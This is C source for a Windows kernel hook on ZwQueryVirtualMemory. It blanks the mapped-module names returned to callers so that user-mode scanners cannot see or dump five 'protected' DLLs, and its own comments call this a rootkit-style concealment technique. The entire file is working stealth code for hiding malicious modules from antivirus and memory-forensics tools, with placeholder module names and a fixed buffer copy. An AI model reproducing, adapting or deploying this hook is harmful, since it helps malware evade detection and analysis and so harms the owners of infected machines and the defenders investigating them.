// Anti-scan module: a hook on ZwQueryVirtualMemory that blanks the mapped-file
// name returned for MemorySectionName queries when it matches one of the
// "protected" modules listed below. The effect is that user-mode scanners that
// enumerate mapped images through this call no longer see those module paths
// (a rootkit-style concealment technique; the five names are the author's placeholders).
NTSTATUS __stdcall NewZwQueryVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN ULONG MemoryInformationClass,
    OUT PVOID MemoryInformation,
    IN ULONG MemoryInformationLength,
    OUT PULONG ReturnLength
    )
{
    ZWQUERYVIRTUALMEMORY OldZwQueryVirtualMemory;
    NTSTATUS status;
    PUNICODE_STRING SectionName;
    WCHAR lpwzDllName[260] = {0};
    // Names of the protected modules, to keep them from being dumped from memory and uploaded
    WCHAR lpAttackDll[5][260] = {L"1", L"2", L"3", L"4", L"5"};
    USHORT cbCopy;
    int i;

    // Call through to the original routine (via the trampoline in the hook zone)
    // and let it fill the caller's buffer first; the filter runs on its result.
    OldZwQueryVirtualMemory = (ZWQUERYVIRTUALMEMORY)ZwQueryVirtualMemoryHookZone;
    status = OldZwQueryVirtualMemory(
                 ProcessHandle,
                 BaseAddress,
                 MemoryInformationClass,
                 MemoryInformation,
                 MemoryInformationLength,
                 ReturnLength);

    if (status == STATUS_SUCCESS && MemoryInformationClass == MemorySectionName)
    {
        // MemoryInformation is a user-mode buffer; any access may fault, hence the SEH frame.
        __try
        {
            SectionName = (PUNICODE_STRING)MemoryInformation;
            if (ValidateUnicodeString(SectionName))
            {
                if (SectionName->Buffer != NULL && SectionName->Length)
                {
                    // UNICODE_STRING.Length is in bytes and the buffer is not NUL-terminated.
                    // Clamp the copy so a long path cannot overflow the 260-WCHAR local
                    // (the original copied SectionName->Length bytes unbounded), then terminate.
                    cbCopy = SectionName->Length;
                    if (cbCopy > (USHORT)(sizeof(lpwzDllName) - sizeof(WCHAR)))
                        cbCopy = (USHORT)(sizeof(lpwzDllName) - sizeof(WCHAR));
                    memcpy(lpwzDllName, SectionName->Buffer, cbCopy);
                    lpwzDllName[cbCopy / sizeof(WCHAR)] = L'\0';

                    // Substring match against each protected name
                    for (i = 0; i < 5; i++)
                    {
                        if (wcsstr(lpwzDllName, lpAttackDll[i]) != NULL)
                        {
                            // Zero the returned name so the caller sees an empty section name
                            memset(SectionName->Buffer, 0, SectionName->MaximumLength);
                            break;
                        }
                    }
                }
            }
        }
        __except (EXCEPTION_EXECUTE_HANDLER)
        {
            // The user buffer faulted; hand back the original status untouched
        }
    }
    return status;
}